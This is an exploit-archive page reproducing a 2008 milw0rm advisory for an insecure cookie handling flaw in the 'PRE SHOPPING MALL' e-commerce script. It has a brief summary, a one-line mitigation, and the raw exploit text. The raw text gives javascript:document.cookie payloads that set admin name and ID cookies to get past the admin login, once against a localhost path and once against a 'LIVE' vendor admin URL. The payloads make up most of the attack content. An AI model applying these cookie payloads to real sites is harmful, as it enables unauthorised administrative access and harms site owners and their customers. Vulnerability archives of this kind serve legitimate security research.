header-logo
Suggest Exploit
vendor:
PRE SHOPPING MALL
by:
G4N0K
7.5
CVSS
HIGH
Insecure Cookie Handling
264
CWE
Product Name: PRE SHOPPING MALL
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PRE SHOPPING MALL Insecure Cookie Handling

An attacker can inject malicious code into the cookie of the admin panel of the PRE SHOPPING MALL website. This can be done by using the javascript code: document.cookie = "adminname=admin" and document.cookie = "adminid=admin".

Mitigation:

Ensure that the cookie is encrypted and that the user is authenticated before allowing access to the admin panel.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PRE SHOPPING MALL Insecure Cookie Handling
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	PRE SHOPPING MALL
[~] Language :         	PHP
[~] Website[main]:     	http://www.preproject.com
[~] Website[script]:    http://www.preproject.com/emall.asp
[~] Type :             	Commercial
[~] Report-Date :     	05/11/2008
[~] Founder :			G4N0K <mail.ganok[at]gmail.com>

===============================================================================

===[ Insecure Cookie Handling ]===
Admin Panel: http://localhost/[path]/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";



===[ LIVE ]===
Admin Panel: http://preproject.com/emall/admin/loginform.php
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";





===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-05]

Navigation

Suggest Exploit

Services By CQR